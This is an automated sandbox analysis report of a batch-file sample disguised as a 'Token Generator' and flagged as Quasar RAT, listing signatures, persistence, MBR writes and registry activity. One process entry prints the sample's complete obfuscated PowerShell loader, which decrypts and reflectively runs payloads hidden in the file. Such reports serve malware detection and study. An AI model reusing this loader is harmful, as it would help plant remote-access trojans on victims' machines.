Malware Analysis Report

2024-10-19 06:33

Sample ID 240527-12tfcach85
Target Token Generator.bat
SHA256 9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
Tags
execution quasar token gen bootkit discovery persistence spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b

Threat Level: Known bad

The file Token Generator.bat was found to be: Known bad.

Malicious Activity Summary

execution quasar token gen bootkit discovery persistence spyware trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar RAT

Quasar payload

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Drops file in Drivers directory

Sets service image path in registry

Checks BIOS information in registry

Checks computer location settings

Executes dropped EXE

Checks installed software on the system

Enumerates connected drives

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 22:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 22:09

Reported

2024-05-27 22:09

Platform

win7-20240508-en

Max time kernel

3s

Max time network

0s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

N/A

Files

memory/2316-4-0x000007FEF649E000-0x000007FEF649F000-memory.dmp

memory/2316-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2316-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2316-7-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-8-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-10-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-9-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-11-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-12-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 22:09

Reported

2024-05-27 22:11

Platform

win10v2004-20240426-en

Max time kernel

115s

Max time network

117s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4860 created 624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\mbamtestfile.dat C:\Users\Admin\Downloads\MBSetup.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\MBSetup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\Downloads\MBSetup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Discord C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4860 set thread context of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Malwarebytes\04c273931c7611ef853afe5db4a87adc C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\04c273941c7611efac30fe5db4a87adc C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files (x86)\mbamtestfile.dat C:\Users\Admin\Downloads\MBSetup.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\c0f5b849-948f-4f90-a096-7c4bf9ebb704 C:\Users\Admin\Downloads\MBSetup.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe C:\Users\Admin\Downloads\MBSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000079db0400d10bda458d4a587e576cd728000000000200000000001066000000010000200000008bae4dbdfd9085617f2083a33ac05c6857d7cc0d9d918a2977e2d718835d4905000000000e800000000200002000000082fc5cfa799e87b98d25d6e6f29e7746eab4de5800ecde36d7b8880ba47b19a9b0030000c2cdf61b34875672d89681440811593601650a6e19a8098f93e7528aeaffb5705a105d7679567c56cb29937e4f4b06cc3b1c210adbc2772899d839a822e3b0dae8e315fe238fa9f147d2222c184baea47e3eb59d7ad831856cd3906408ceab0833aac9954ec1e63ccff806018015533d7a6e43a9499fd0c02bcdd302451e10358472cce15818a1e5c07bff009ba3a98983fc0387717cd8abb095f5b7b49a402155ba9d04af2d3ed6ebbbb380b9a21923f75fa3e1049a6d9bd043a60b46bc9e5d4b5f0b027bc682b6a0582148b506aefa6fd3851f99d3ab0a7947dc20cad0c4b2d80cc464c229199feb0307071c71d08a3976585631c9380e62e56fa3809df4cc0ab097adb7859d0d059aaad986947ce8acba6a47754136195316e216cf5dd011c43e4d943b8cfe311e68eaf20b15c544fde477a5b5afc8520599c91ad8373490a48b714e43339e6998ad6ccbe2799aa728855f48e39598b67af67befaf2eb0a9269d75d3a71639a8d0128ef7515b1310d71c08e09bff9f4e4a854ad7f6a646faff804db4527619d2d3530b227f5167a8941d36d39df4f1a8ee92985b2c868852695527a7a63a645c2948ad5cefdd1ea90c2f5e4af82e26e656e9af233e4cfe887775e263e6e4a95ec21dc4cb3921b3c235579f6ad9160397d51749545239abb80c5f202e9b8f2ade05b61076dc82b5ebf3d2b705b1043b0bc0a2139cb056897db94e020cde722b93175a07709da4f0f6098b2eafe4de02212a197961a5909310430e6f3298e340a38875d1710f34a12b93f2c632442ff096053892085f1ea6d90e4d07cb5d71e7b987dc75e75e82ade735fc671bb31414b48d61c27e0e42c09de336ed20d934777f0b8ca6c4fff3923debed911da9a52fe0e25336f70493a707ce74d8f9078db9445e7044f4ba79e86ebb5b21bb70fabb66700178778a17f1f8fe501af153977c949f283bafcea40400fc0937b15e6e1fe503d41d86331527b595c6a8a5a0174eb749a6641312203ee9c3ed94847abbd78aa72d260723390b61e618f71cafa246547d75a670984021746728a0c8a0c5b1d124cadcfb77d247fb0e4f71db5db8aa91263d77be08854cbd02d99197cfcc933f258aa2d8e1984a27371a9009fb8f2e2cd37a002c9a430d0e2f113fdfc40ee69739fe1a62ad4c4bb98d1dec97b75bc51a9711b55c0cba98c6fc58d98c7e99bfed5354a34834918f69999c41e12b19c352ecc27ef670738bcfe792c215ff4a98ab3ef16b463d72d547d0748ab6873813cb8d02a0dc5fd87501898889299fc5e8e489b8d69d44fb17429a85e7d1b4328c2a67c35760f396004740000000bd683d94bfe32d569c3204b8847e92ad52656a12e2ba9df7a0995e835f39e66409c84691ebdd3bb8483d36717452ec677c2af25d446a558493e2a644fa39f24c C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018400E1E99464E" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
